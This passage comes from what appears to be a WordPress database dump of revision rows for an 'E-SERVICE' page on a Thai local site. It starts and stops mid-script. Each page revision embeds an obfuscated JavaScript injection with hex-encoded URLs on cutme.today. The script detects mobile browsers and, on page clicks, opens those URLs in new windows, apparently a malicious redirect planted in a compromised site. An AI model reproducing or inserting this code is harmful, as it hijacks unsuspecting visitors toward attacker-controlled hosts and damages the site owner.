_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 11:44:39','2025-07-03 04:44:39','',459,'http://pakhaeng.ssk.in.th/?p=1647',0,'revision','',0),
(1648,1,'2025-07-03 11:45:08','2025-07-03 04:45:08','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\" class=\"wp-image-1638\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 11:45:08','2025-07-03 04:45:08','',459,'http://pakhaeng.ssk.in.th/?p=1648',0,'revision','',0),
(1649,1,'2025-07-03 11:46:58','2025-07-03 04:46:58','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\" class=\"wp-image-1638\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 